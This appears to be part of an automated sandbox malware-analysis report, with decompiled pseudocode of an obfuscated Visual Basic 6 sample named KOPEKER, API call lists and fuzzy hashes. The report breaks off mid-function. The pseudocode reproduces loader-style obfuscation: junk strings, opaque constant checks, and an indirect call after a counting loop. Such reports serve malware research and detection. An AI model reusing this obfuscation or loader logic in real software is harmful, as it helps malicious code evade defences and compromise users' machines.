          						 *_t292 =  *(_t868 - 0x2dc) & 0x00000000;
          						__eflags =  *_t292;
          					} else {
          						_push(0x718);
          						_push(0x4105e8);
          						_push( *((intOrPtr*)(_t868 + 8)));
          						_push( *(_t868 - 0x250));
          						L00401906();
          						 *(_t868 - 0x2dc) = _t709;
          					}
          					 *((intOrPtr*)(_t868 - 0xe4)) =  *((intOrPtr*)(_t868 - 0x230));
          					 *((intOrPtr*)(_t868 - 4)) = 0x43;
          					L004018F4();
          					 *((short*)(_t868 - 0x228)) = 0x5b73;
          					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t868 + 8)))) + 0x72c))( *((intOrPtr*)(_t868 + 8)), _t868 - 0x228, _t868 - 0x134, _t868 - 0x244);
          					_t911 =  *((long long*)(_t868 - 0x244));
          					 *((long long*)(_t868 - 0x2c)) = _t911;
          					L00401924();
          					 *((intOrPtr*)(_t868 - 4)) = 0x44;
          					 *(_t868 - 0x1bc) = 0x2ffff;
          					 *((intOrPtr*)(_t868 - 0x1c4)) = 0x8003;
          					_push(_t868 - 0x80);
          					_t717 = _t868 - 0x1c4;
          					_push(_t717);
          					L004018DC();
          					_t718 = _t717;
          					if(_t718 == 0) {
          						break;
          					}
          				}
          				 *((intOrPtr*)(_t868 - 4)) = 0x47;
          				 *(_t868 - 0x1bc) = 0xe8;
          				do {
          					_t718 = _t718 + 1;
          					__eflags = _t718 - 0xfff9a646;
          				} while (_t718 != 0xfff9a646);
          				 *_t870(_t718 + 0x46f11c);
          				_t869 = _t868 - 1;
          				asm("movsb");
          				L004018E8();
          				 *((intOrPtr*)(_t869 - 4)) = 0x48;
          				 *((intOrPtr*)(_t869 - 0x238)) = 0x8904d3f8;
          				 *((intOrPtr*)(_t869 - 0x234)) = 0x98e72e79;
          				 *(_t869 - 0x230) = 0x5f72a;
          				_push(0x98e72e79);
          				_push(L"bangsternears");
          				_t721 = _t869 - 0x13c;
          				_push(_t721);
          				L004018D6();
          				_push(_t721);
          				_push(_t869 - 0x238);
          				_push(_t869 - 0x234);
          				_push(_t869 - 0x230);
          				_push(0x8310a4);
          				_push(L"samtaleemnetsrhes");
          				_t725 = _t869 - 0x138;
          				_push(_t725);
          				L004018D6();
          				_push(_t725);
          				_push(L"Charcuterieganocephalantu");
          				_t726 = _t869 - 0x134;
          				_push(_t726);
          				L004018D6();
          				_push(_t726);
          				E004115F4();
          				 *((intOrPtr*)(_t869 - 0x23c)) = _t726;
          				L004018D0();
          				__eflags =  *((intOrPtr*)(_t869 - 0x23c)) - 0x8904d3f8;
          				 *(_t869 - 0x250) =  ~(0 |  *((intOrPtr*)(_t869 - 0x23c)) == 0x8904d3f8);
          				_push(_t869 - 0x13c);
          				_push(_t869 - 0x138);
          				_push(_t869 - 0x134);
          				_push(3);
          				L004018CA();
          				_t871 = _t870 + 0x10;
          				__eflags =  *(_t869 - 0x250);
          				if( *(_t869 - 0x250) != 0) {
          					 *((intOrPtr*)(_t869 - 4)) = 0x49;
          					 *((intOrPtr*)(_t869 - 4)) = 0x4a;
          					__eflags =  *0x4183d8;
          					if( *0x4183d8 != 0) {
          						 *(_t869 - 0x2e0) = 0x4183d8;
          					} else {
          						_push(0x4183d8);
          						_push(0x411ae0);
          						L004018C4();
          						 *(_t869 - 0x2e0) = 0x4183d8;
          					}
          					 *(_t869 - 0x250) =  *( *(_t869 - 0x2e0));
          					_t810 = _t869 - 0x154;
          					L004018B2();
          					_t871 = _t871 + 0x10;
          					L004018B8();
          					_t811 = _t869 - 0x140;
          					L004018BE();
          					_t814 =  *((intOrPtr*)( *( *(_t869 - 0x250)) + 0xc))( *(_t869 - 0x250), _t811, _t811, _t810, _t810, _t810,  *((intOrPtr*)(_t869 - 0xa0)), L"M9uACtmJ7nAtSvje8kbN9w249", 0);
          					asm("fclex");
          					 *(_t869 - 0x254) = _t814;
          					__eflags =  *(_t869 - 0x254);
          					if( *(_t869 - 0x254) >= 0) {
          						_t351 = _t869 - 0x2e4;
          						 *_t351 =  *(_t869 - 0x2e4) & 0x00000000;
          						__eflags =  *_t351;
          					} else {
          						_push(0xc);
          						_push(0x411ad0);
          						_push( *(_t869 - 0x250));
          						_push( *(_t869 - 0x254));
          						L00401906();
          						 *(_t869 - 0x2e4) = _t814;
          					}
          					L004018AC();
          					L00401912();
          				}
          				 *((intOrPtr*)(_t869 - 4)) = 0x4c;
          				 *(_t869 - 0x230) = 0x792720;
          				_t357 = _t869 - 0x230; // 0x792720
          				_push(L"bangsternears");
          				_t735 = _t869 - 0x134;
          				_push(_t735);
          				L004018D6();
          				_push(_t735);
          				E0041165C();
          				 *((short*)(_t869 - 0x228)) = _t735;
          				L004018D0();
          				asm("sbb eax, eax");
          				 *(_t869 - 0x250) =  ~( ~( *((short*)(_t869 - 0x228)) - 0x8904d3f8) + 1);
          				L00401924();
          				__eflags =  *(_t869 - 0x250);
          				if( *(_t869 - 0x250) != 0) {
          					 *((intOrPtr*)(_t869 - 4)) = 0x4d;
          					 *((intOrPtr*)(_t869 - 4)) = 0x4e;
          					 *(_t869 - 0x1bc) = L"rebslagerierneshand";
          					 *((intOrPtr*)(_t869 - 0x1c4)) = 8;
          					 *((intOrPtr*)(_t869 - 0x1dc)) = 0x6e5392;
          					 *((intOrPtr*)(_t869 - 0x1e4)) = 3;
          					_push(0x10);
          					L004016F0();
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_push(0x10);
          					L004016F0();
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_push(2);
          					_push(L"EAuxmqjme0cZFWWnSnEvZMsikYtH2nYa25");
          					_push( *((intOrPtr*)(_t869 - 0x24)));
          					L004018FA();
          					_t871 = _t871 + 0x2c;
          				}
          				 *((intOrPtr*)(_t869 - 4)) = 0x50;
          				_push(0x8904d3f8);
          				_push(L"Statscheferstronhi8");
          				_t742 = _t869 - 0x138;
          				_push(_t742);
          				L004018D6();
          				_push(_t742);
          				_push(L"encryptions");
          				_t743 = _t869 - 0x134;
          				_push(_t743);
          				L004018D6();
          				_push(_t743);
          				_push(0x753eca);
          				_push(0x3db7db);
          				_push(0x8904d3f8);
          				E0041169C();
          				 *(_t869 - 0x230) = _t743;
          				L004018D0();
          				__eflags =  *(_t869 - 0x230) - 0x98e72e79;
          				 *(_t869 - 0x250) =  ~(0 |  *(_t869 - 0x230) == 0x98e72e79);
          				_push(_t869 - 0x138);
          				_push(_t869 - 0x134);
          				_push(2);
          				L004018CA();
          				_t872 = _t871 + 0xc;
          				_t749 =  *(_t869 - 0x250);
          				__eflags = _t749;
          				if(_t749 != 0) {
          					 *((intOrPtr*)(_t869 - 4)) = 0x51;
          					 *((intOrPtr*)(_t869 - 4)) = 0x52;
          					_push(0);
          					_push(L"sykofanter");
          					_push(_t869 - 0x154);
          					L00401918();
          					_t749 = 0x10;
          					L004016F0();
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_push(0);
          					_push( *((intOrPtr*)(_t869 - 0x104)));
          					L0040191E();
          					L00401912();
          				}
          				 *((intOrPtr*)(_t869 - 4)) = 0x54;
          				_push(0x3a3aea);
          				_push(0x8904d3f8);
          				_push(0x98e72e79);
          				_push(0x98e72e79);
          				E004116EC();
          				 *(_t869 - 0x230) = _t749;
          				L004018D0();
          				__eflags =  *(_t869 - 0x230) - 0x404672;
          				if( *(_t869 - 0x230) == 0x404672) {
          					 *((intOrPtr*)(_t869 - 4)) = 0x55;
          					 *((intOrPtr*)(_t869 - 4)) = 0x56;
          					 *(_t869 - 0x1bc) = L"rebslagerierneshand";
          					 *((intOrPtr*)(_t869 - 0x1c4)) = 8;
          					L004018A0();
          					_push(2);
          					_t749 = _t869 - 0x154;
          					_push(_t749);
          					L004018A6();
          					 *((long long*)(_t869 - 0xc4)) = _t911;
          					L00401912();
          				}
          				 *((intOrPtr*)(_t869 - 4)) = 0x58;
          				_push(0x350dde);
          				_push(0x58e1c9);
          				E0041173C();
          				 *(_t869 - 0x230) = _t749;
          				L004018D0();
          				__eflags =  *(_t869 - 0x230) - 0x5bdd58;
          				if( *(_t869 - 0x230) == 0x5bdd58) {
          					 *((intOrPtr*)(_t869 - 4)) = 0x59;
          					 *((intOrPtr*)(_t869 - 0x17c)) = 0x80020004;
          					 *((intOrPtr*)(_t869 - 0x184)) = 0xa;
          					 *((intOrPtr*)(_t869 - 0x16c)) = 0x80020004;
          					 *((intOrPtr*)(_t869 - 0x174)) = 0xa;
          					 *((intOrPtr*)(_t869 - 0x15c)) = 0x80020004;
          					 *((intOrPtr*)(_t869 - 0x164)) = 0xa;
          					 *(_t869 - 0x1bc) = L"Charcuterieganocephalantu";
          					 *((intOrPtr*)(_t869 - 0x1c4)) = 8;
          					L004018A0();
          					_push(_t869 - 0x184);
          					_push(_t869 - 0x174);
          					_push(_t869 - 0x164);
          					_push(0);
          					_push(_t869 - 0x154);
          					L0040189A();
          					_push(_t869 - 0x184);
          					_push(_t869 - 0x174);
          					_push(_t869 - 0x164);
          					_t749 = _t869 - 0x154;
          					_push(_t749);
          					_push(4);
          					L00401942();
          					_t872 = _t872 + 0x14;
          				}
          				 *((intOrPtr*)(_t869 - 4)) = 0x5b;
          				L004018F4();
          				_push(_t749);
          				_push(_t869 - 0x138);
          				L004018D6();
          				_push(0x8904d3f8);
          				_t751 = _t869 - 0x138;
          				_push(_t751);
          				E004117B0();
          				 *(_t869 - 0x230) = _t751;
          				L004018D0();
          				__eflags =  *(_t869 - 0x230) - 0x272878;
          				 *(_t869 - 0x250) =  ~(0 |  *(_t869 - 0x230) == 0x00272878);
          				_push(_t869 - 0x138);
          				_push(_t869 - 0x134);
          				_push(2);
          				L004018CA();
          				_t757 =  *(_t869 - 0x250);
          				__eflags = _t757;
          				if(_t757 != 0) {
          					 *((intOrPtr*)(_t869 - 4)) = 0x5c;
          					_push(L"LAANELOFTERNE");
          					L00401894();
          				}
          				 *((intOrPtr*)(_t869 - 4)) = 0x5e;
          				_push(0x8904d3f8);
          				_push(0xd2930);
          				E004117FC();
          				 *(_t869 - 0x230) = _t757;
          				L004018D0();
          				__eflags =  *(_t869 - 0x230) - 0x8904d3f8;
          				if( *(_t869 - 0x230) == 0x8904d3f8) {
          					 *((intOrPtr*)(_t869 - 4)) = 0x5f;
          					 *(_t869 - 0x1bc) = L"samtaleemnetsrhes";
          					 *((intOrPtr*)(_t869 - 0x1c4)) = 8;
          					L004018A0();
          					_push(_t869 - 0x154);
          					L0040188E();
          					L00401912();
          				}
          				 *((intOrPtr*)(_t869 - 4)) = 0x61;
          				_push(L"Gooiest4");
          				_t758 = _t869 - 0x134;
          				_push(_t758);
          				L004018D6();
          				_push(_t758);
          				_push(0x98e72e79);
          				E00411840();
          				 *(_t869 - 0x230) = _t758;
          				L004018D0();
          				__eflags =  *(_t869 - 0x230) - 0x86be28;
          				 *(_t869 - 0x250) =  ~(0 |  *(_t869 - 0x230) == 0x0086be28);
          				L00401924();
          				_t762 =  *(_t869 - 0x250);
          				__eflags = _t762;
          				if(_t762 != 0) {
          					 *((intOrPtr*)(_t869 - 4)) = 0x62;
          					 *((intOrPtr*)(_t869 - 4)) = 0x63;
          					 *(_t869 - 0x1bc) = L"Porto7";
          					 *((intOrPtr*)(_t869 - 0x1c4)) = 8;
          					L004018A0();
          					_push(2);
          					_t762 = _t869 - 0x154;
          					_push(_t762);
          					L004018A6();
          					 *((long long*)(_t869 - 0x9c)) = _t911;
          					L00401912();
          				}
          				 *((intOrPtr*)(_t869 - 4)) = 0x65;
          				_push(0x753f16);
          				_push(0x98e72e79);
          				_push(0x49db89);
          				E00411884();
          				 *(_t869 - 0x230) = _t762;
          				L004018D0();
          				__eflags =  *(_t869 - 0x230) - 0x98e72e79;
          				if( *(_t869 - 0x230) == 0x98e72e79) {
          					 *((intOrPtr*)(_t869 - 4)) = 0x66;
          					__eflags =  *0x4183d8;
          					if( *0x4183d8 != 0) {
          						 *(_t869 - 0x2e8) = 0x4183d8;
          					} else {
          						_push(0x4183d8);
          						_push(0x411ae0);
          						L004018C4();
          						 *(_t869 - 0x2e8) = 0x4183d8;
          					}
          					 *(_t869 - 0x250) =  *( *(_t869 - 0x2e8));
          					_t794 = _t869 - 0x140;
          					L004018BE();
          					_t762 =  *((intOrPtr*)( *( *(_t869 - 0x250)) + 0x10))( *(_t869 - 0x250), _t794, _t794,  *((intOrPtr*)(_t869 + 8)));
          					asm("fclex");
          					 *(_t869 - 0x254) = _t762;
          					__eflags =  *(_t869 - 0x254);
          					if( *(_t869 - 0x254) >= 0) {
          						_t483 = _t869 - 0x2ec;
          						 *_t483 =  *(_t869 - 0x2ec) & 0x00000000;
          						__eflags =  *_t483;
          					} else {
          						_push(0x10);
          						_push(0x411ad0);
          						_push( *(_t869 - 0x250));
          						_push( *(_t869 - 0x254));
          						L00401906();
          						 *(_t869 - 0x2ec) = _t762;
          					}
          					L004018AC();
          				}
          				 *((intOrPtr*)(_t869 - 4)) = 0x68;
          				_push(0x2a551);
          				_push(0x98e72e79);
          				_push(0x8904d3f8);
          				E004118CC();
          				 *(_t869 - 0x230) = _t762;
          				L004018D0();
          				__eflags =  *(_t869 - 0x230) - 0x8904d3f8;
          				if( *(_t869 - 0x230) == 0x8904d3f8) {
          					 *((intOrPtr*)(_t869 - 4)) = 0x69;
          					_t785 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t869 + 8)))) + 0x160))( *((intOrPtr*)(_t869 + 8)), _t869 - 0x140);
          					asm("fclex");
          					 *(_t869 - 0x250) = _t785;
          					__eflags =  *(_t869 - 0x250);
          					if( *(_t869 - 0x250) >= 0) {
          						_t499 = _t869 - 0x2f0;
          						 *_t499 =  *(_t869 - 0x2f0) & 0x00000000;
          						__eflags =  *_t499;
          					} else {
          						_push(0x160);
          						_push(0x4105b8);
          						_push( *((intOrPtr*)(_t869 + 8)));
          						_push( *(_t869 - 0x250));
          						L00401906();
          						 *(_t869 - 0x2f0) = _t785;
          					}
          					__eflags =  *0x4183d8;
          					if( *0x4183d8 != 0) {
          						 *(_t869 - 0x2f4) = 0x4183d8;
          					} else {
          						_push(0x4183d8);
          						_push(0x411ae0);
          						L004018C4();
          						 *(_t869 - 0x2f4) = 0x4183d8;
          					}
          					 *(_t869 - 0x254) =  *( *(_t869 - 0x2f4));
          					 *(_t869 - 0x270) =  *(_t869 - 0x140);
          					 *(_t869 - 0x140) =  *(_t869 - 0x140) & 0x00000000;
          					_t789 = _t869 - 0x144;
          					L00401888();
          					_t762 =  *((intOrPtr*)( *( *(_t869 - 0x254)) + 0x40))( *(_t869 - 0x254), _t789, _t789,  *(_t869 - 0x270), L"incomprehensible");
          					asm("fclex");
          					 *(_t869 - 0x258) = _t762;
          					__eflags =  *(_t869 - 0x258);
          					if( *(_t869 - 0x258) >= 0) {
          						_t519 = _t869 - 0x2f8;
          						 *_t519 =  *(_t869 - 0x2f8) & 0x00000000;
          						__eflags =  *_t519;
          					} else {
          						_push(0x40);
          						_push(0x411ad0);
          						_push( *(_t869 - 0x254));
          						_push( *(_t869 - 0x258));
          						L00401906();
          						 *(_t869 - 0x2f8) = _t762;
          					}
          					L004018AC();
          				}
          				 *((intOrPtr*)(_t869 - 4)) = 0x6b;
          				_push(0x8904d3f8);
          				E00411914();
          				 *(_t869 - 0x230) = _t762;
          				L004018D0();
          				__eflags =  *(_t869 - 0x230) - 0x98e72e79;
          				if( *(_t869 - 0x230) == 0x98e72e79) {
          					 *((intOrPtr*)(_t869 - 4)) = 0x6c;
          					 *((intOrPtr*)(_t869 - 4)) = 0x6d;
          					 *((intOrPtr*)(_t869 - 0x1ac)) = 0x80020004;
          					 *((intOrPtr*)(_t869 - 0x1b4)) = 0xa;
          					 *((intOrPtr*)(_t869 - 0x19c)) = 0x80020004;
          					 *((intOrPtr*)(_t869 - 0x1a4)) = 0xa;
          					 *((intOrPtr*)(_t869 - 0x18c)) = 0x80020004;
          					 *((intOrPtr*)(_t869 - 0x194)) = 0xa;
          					 *((intOrPtr*)(_t869 - 0x17c)) = 0x80020004;
          					 *((intOrPtr*)(_t869 - 0x184)) = 0xa;
          					 *((intOrPtr*)(_t869 - 0x16c)) = 0x80020004;
          					 *((intOrPtr*)(_t869 - 0x174)) = 0xa;
          					 *((intOrPtr*)(_t869 - 0x15c)) = 0x80020004;
          					 *((intOrPtr*)(_t869 - 0x164)) = 0xa;
          					 *(_t869 - 0x1bc) = L"samtaleemnetsrhes";
          					 *((intOrPtr*)(_t869 - 0x1c4)) = 8;
          					L004018A0();
          					_push(_t869 - 0x1b4);
          					_push(_t869 - 0x1a4);
          					_push(_t869 - 0x194);
          					_push(_t869 - 0x184);
          					_push(_t869 - 0x174);
          					_push(_t869 - 0x164);
          					_push(_t869 - 0x154);
          					L0040187C();
          					L00401882();
          					_push(_t869 - 0x1b4);
          					_push(_t869 - 0x1a4);
          					_push(_t869 - 0x194);
          					_push(_t869 - 0x184);
          					_push(_t869 - 0x174);
          					_push(_t869 - 0x164);
          					_push(_t869 - 0x154);
          					_push(7);
          					L00401942();
          				}
          				 *((intOrPtr*)(_t869 - 4)) = 0x6f;
          				_push(L"Gastriloquy");
          				_t763 = _t869 - 0x134;
          				_push(_t763);
          				L004018D6();
          				_push(_t763);
          				E00411970();
          				 *(_t869 - 0x230) = _t763;
          				L004018D0();
          				__eflags =  *(_t869 - 0x230) - 0x2ee60b;
          				 *(_t869 - 0x250) =  ~(0 |  *(_t869 - 0x230) == 0x002ee60b);
          				L00401924();
          				_t767 =  *(_t869 - 0x250);
          				__eflags = _t767;
          				if(__eflags != 0) {
          					 *((intOrPtr*)(_t869 - 4)) = 0x70;
          					 *((intOrPtr*)(_t869 - 4)) = 0x71;
          					_push(0x1c);
          					L00401876();
          					 *(_t869 - 0x8c) = _t767;
          				}
          				 *((intOrPtr*)(_t869 - 4)) = 0x73;
          				asm("fldz");
          				L00401756();
          				L0040193C();
          				asm("fcomp qword [0x4013a0]");
          				asm("fnstsw ax");
          				asm("sahf");
          				if(__eflags != 0) {
          					 *((intOrPtr*)(_t869 - 4)) = 0x74;
          					L00401870();
          				}
          				 *((intOrPtr*)(_t869 - 0x10)) = 0;
          				asm("wait");
          				_push(0x414a5b);
          				L004018AC();
          				L004018AC();
          				L00401912();
          				L00401912();
          				L00401924();
          				L004018AC();
          				L004018AC();
          				L004018AC();
          				return _t767;
          			}














































          APIs
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,000006F8,?,?,98E72E79,00000012,B33C5640,00005B05,?,00000059,?,00000086), ref: 004135D6
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,0000070C,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012,B33C5640,00005B05), ref: 0041369B
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,000006FC,?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012), ref: 004137B4
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,000006F8,?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012), ref: 0041380D
          • __vbaStrCopy.MSVBVM60(?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012,B33C5640,00005B05,?,00000059), ref: 00413833
          • __vbaFreeStr.MSVBVM60(?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012,B33C5640,00005B05,?,00000059), ref: 00413870
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$CheckHresult$CopyFree
          • String ID: D$Statscheferstronhi8$rebslagerierneshand$s[$)#
          • API String ID: 339450102-1043960473
          • Opcode ID: 2ec0c361b1126fae7113e2263c8e49ed3c6af6329862bc5457209a1dbdab7286
          • Instruction ID: 808cc1adde80d5d5ae7107b4651ea752de92fb4ca7a003286aae542fa28decbc
          • Opcode Fuzzy Hash: 2ec0c361b1126fae7113e2263c8e49ed3c6af6329862bc5457209a1dbdab7286
          • Instruction Fuzzy Hash: 0B42DE74901229EFDB11DF90CD88BD8BBB4FF08345F0041E6E948AA2A0D7789B94DF08
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          C-Code - Quality: 56%
          			E00417239(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
          				intOrPtr _v8;
          				intOrPtr* _v12;
          				void* _v24;
          				char _v28;
          				void* _v32;
          				void* _v36;
          				signed int _v40;
          				char _v56;
          				char* _v64;
          				char _v72;
          				signed int _v76;
          				signed int _v80;
          				intOrPtr* _v84;
          				signed int _v88;
          				signed int _v96;
          				signed long long _v100;
          				signed int _v104;
          				intOrPtr* _v108;
          				signed int _v112;
          				signed int _v116;
          				signed int _t74;
          				signed int _t78;
          				char* _t79;
          				signed int _t85;
          				signed int _t91;
          				char* _t101;
          				intOrPtr* _t118;
          				signed long long _t129;
          
          				_push(0x4016f6);
          				_push( *[fs:0x0]);
          				 *[fs:0x0] = _t118;
          				_push(0x60);
          				L004016F0();
          				_v12 = _t118;
          				_v8 = 0x4016d0;
          				_v64 = 0x411f34;
          				_v72 = 8;
          				L004018A0();
          				_t74 =  &_v56;
          				_push(_t74); // executed
          				L00401816(); // executed
          				L00401882();
          				_push(_t74);
          				_push(0);
          				L0040184C();
          				asm("sbb eax, eax");
          				_v76 =  ~( ~_t74 + 1);
          				L00401924();
          				_t101 =  &_v56;
          				L00401912();
          				_t78 = _v76;
          				if(_t78 != 0) {
          					_push(_t101);
          					 *_t118 =  *0x4016c8;
          					_t129 =  *0x4016c0 *  *0x401618;
          					if( *0x418000 != 0) {
          						_push( *0x401614);
          						_push( *0x401610);
          						L00401714();
          					} else {
          						_t129 = _t129 /  *0x401610;
          					}
          					_v100 = _t129;
          					 *_t118 = _v100;
          					_v64 =  *0x4016b8;
          					L0040183A();
          					_v72 =  *0x4016a8;
          					_v76 =  *0x4014c8;
          					_v80 =  *0x4014c8;
          					_t78 =  *((intOrPtr*)( *_a4 + 0x2c0))(_a4, 0x1c2, _t101, _t101, _t101, _t78, _t101, _t101);
          					asm("fclex");
          					_v76 = _t78;
          					if(_v76 >= 0) {
          						_v104 = _v104 & 0x00000000;
          					} else {
          						_push(0x2c0);
          						_push(0x4105b8);
          						_push(_a4);
          						_push(_v76);
          						L00401906();
          						_v104 = _t78;
          					}
          				}
          				_push(0x411f40);
          				_push(0x411f40);
          				L0040184C();
          				if(_t78 != 0) {
          					if( *0x4183d8 != 0) {
          						_v108 = 0x4183d8;
          					} else {
          						_push(0x4183d8);
          						_push(0x411ae0);
          						L004018C4();
          						_v108 = 0x4183d8;
          					}
          					_v76 =  *_v108;
          					_t85 =  *((intOrPtr*)( *_v76 + 0x4c))(_v76,  &_v36);
          					asm("fclex");
          					_v80 = _t85;
          					if(_v80 >= 0) {
          						_v112 = _v112 & 0x00000000;
          					} else {
          						_push(0x4c);
          						_push(0x411ad0);
          						_push(_v76);
          						_push(_v80);
          						L00401906();
          						_v112 = _t85;
          					}
          					_v84 = _v36;
          					_v64 = 0x75;
          					_v72 = 2;
          					L004016F0();
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_t91 =  *((intOrPtr*)( *_v84 + 0x1c))(_v84, 0x10,  &_v40);
          					asm("fclex");
          					_v88 = _t91;
          					if(_v88 >= 0) {
          						_v116 = _v116 & 0x00000000;
          					} else {
          						_push(0x1c);
          						_push(0x411dac);
          						_push(_v84);
          						_push(_v88);
          						L00401906();
          						_v116 = _t91;
          					}
          					_v96 = _v40;
          					_v40 = _v40 & 0x00000000;
          					_push(_v96);
          					_push( &_v28);
          					L00401888();
          					L004018AC();
          				}
          				_v64 = L"Colmars8";
          				_v72 = 8;
          				L004018A0();
          				_push(0);
          				_t79 =  &_v56;
          				_push(_t79); // executed
          				L0040178C(); // executed
          				L00401882();
          				L00401912();
          				asm("wait");
          				_push(0x4174d9);
          				L00401924();
          				L004018AC();
          				return _t79;
          			}
































          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00417254
          • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 0041727A
          • #667.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00417283
          • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 0041728D
          • __vbaStrCmp.MSVBVM60(00000000,00000000,?), ref: 00417295
          • __vbaFreeStr.MSVBVM60(00000000,00000000,?), ref: 004172A8
          • __vbaFreeVar.MSVBVM60(00000000,00000000,?), ref: 004172B0
          • _adj_fdiv_m64.MSVBVM60(?,00000000,00000000,?), ref: 004172F4
          • __vbaFpI4.MSVBVM60(?,?,?,00000000,00000000,?), ref: 00417313
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105B8,000002C0,?,?,?,00000000,?,?,?,00000000,00000000,?), ref: 00417365
          • __vbaStrCmp.MSVBVM60(00411F40,00411F40,00000000,00000000,?), ref: 0041737D
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,00411F40,00411F40,00000000,00000000,?), ref: 0041739D
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,0000004C,?,?,?,?,00411F40,00411F40,00000000,00000000,?), ref: 004173E1
          • __vbaChkstk.MSVBVM60(?,?,?,?,?,00411F40,00411F40,00000000,00000000,?), ref: 0041740A
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411DAC,0000001C,?,?,?,?,00411F40,00411F40,00000000,00000000,?), ref: 0041743B
          • __vbaObjSet.MSVBVM60(?,?,?,?,?,?,?,?,00411F40,00411F40,00000000,00000000,?), ref: 0041745A
          • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,00411F40,00411F40,00000000,00000000,?), ref: 00417462
          • __vbaVarDup.MSVBVM60(00411F40,00411F40,00000000,00000000,?), ref: 0041747B
          • #645.MSVBVM60(?,00000000,00411F40,00411F40,00000000,00000000,?), ref: 00417486
          • __vbaStrMove.MSVBVM60(?,00000000,00411F40,00411F40,00000000,00000000,?), ref: 00417490
          • __vbaFreeVar.MSVBVM60(?,00000000,00411F40,00411F40,00000000,00000000,?), ref: 00417498
          • __vbaFreeStr.MSVBVM60(004174D9,?,00000000,00411F40,00411F40,00000000,00000000,?), ref: 004174CB
          • __vbaFreeObj.MSVBVM60(004174D9,?,00000000,00411F40,00411F40,00000000,00000000,?), ref: 004174D3
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$Free$CheckHresult$ChkstkMove$#645#667New2_adj_fdiv_m64
          • String ID: Colmars8$tmp$u
          • API String ID: 4120384274-4136535519
          • Opcode ID: a7af0549e2f10f762b6e209b8676b3ff17c3df8b27577f8ac6b6928b1a0aad03
          • Instruction ID: e01d60fba52cd17f27b1ff523525a2b18ef3ccef428ec1e0229f810d74e07582
          • Opcode Fuzzy Hash: a7af0549e2f10f762b6e209b8676b3ff17c3df8b27577f8ac6b6928b1a0aad03
          • Instruction Fuzzy Hash: 7F711671901208EFDB00EFA1CD46BEEBBB5BF04704F54842AF445BB1A1DB795A85DB18
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          C-Code - Quality: 44%
          			E00415268(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				intOrPtr _v16;
          				void* _v28;
          				intOrPtr _v32;
          				char _v36;
          				char _v40;
          				char _v56;
          				intOrPtr _v64;
          				char _v72;
          				intOrPtr _v80;
          				char _v88;
          				intOrPtr _v96;
          				char _v104;
          				intOrPtr _v112;
          				char _v120;
          				intOrPtr _v128;
          				char _v136;
          				intOrPtr _v144;
          				char _v152;
          				char* _v160;
          				intOrPtr _v168;
          				char* _v268;
          				short _v272;
          				char* _t61;
          				char* _t62;
          				char* _t68;
          				void* _t95;
          				void* _t97;
          				intOrPtr _t98;
          
          				_t98 = _t97 - 0xc;
          				 *[fs:0x0] = _t98;
          				L004016F0();
          				_v16 = _t98;
          				_v12 = 0x401520;
          				_v8 = 0;
          				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4016f6, _t95);
          				_push(0x54c27c);
          				_push(L"bangsternears");
          				_t61 =  &_v40;
          				_push(_t61);
          				L004018D6();
          				_push(_t61);
          				_push(L"hjlrd");
          				_t62 =  &_v36;
          				_push(_t62);
          				L004018D6();
          				_push(_t62);
          				_push(0x4c69df);
          				_push(0x98e72e79);
          				_push(0x8904d3f8); // executed
          				E0041169C(); // executed
          				_v268 = _t62;
          				L004018D0();
          				_v272 =  ~(0 | _v268 == 0x8904d3f8);
          				_push( &_v40);
          				_push( &_v36);
          				_push(2);
          				L004018CA();
          				_t68 = _v272;
          				if(_t68 != 0) {
          					_push(0);
